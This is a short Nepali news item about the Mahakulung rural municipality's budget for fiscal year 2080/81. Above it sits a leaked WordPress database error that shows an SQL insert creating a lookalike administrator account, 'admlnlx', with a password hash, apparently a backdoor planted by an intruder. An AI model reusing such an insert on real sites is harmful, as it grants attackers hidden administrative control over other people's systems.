WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVBDCSOE4lasO8IeLHnzRmaICktSHz.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 15:05:25', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । महाकुङ गाउँपालिकाले आर्थिक वर्ष २०८०/८१ का लागि बजेट सार्वजनिक गरेको छ ।
आईतबार सम्पन्न ११ औँ गाउँसभाबाट ३५ करोड १७ लाख ३५ हजार १०० रुपैयाँ बराबरको बजेट पेश गरेको हो ।
महाकुलुङ गाउँपालिकाको सभाहल बुङमा जिल्ला समन्वय समितिका प्रमुख कृष्ण प्रसाद निरौलाको प्रमुख आतिथ्यता तथा गाउँपालिका अध्यक्ष सुर्य बहादुर कुलुङको अध्यक्षतामा आर्थिक वर्ष २०८०/०८१ को बजेट प्रस्तुत गरिएको गाउँपालिकाले जनाएको छ ।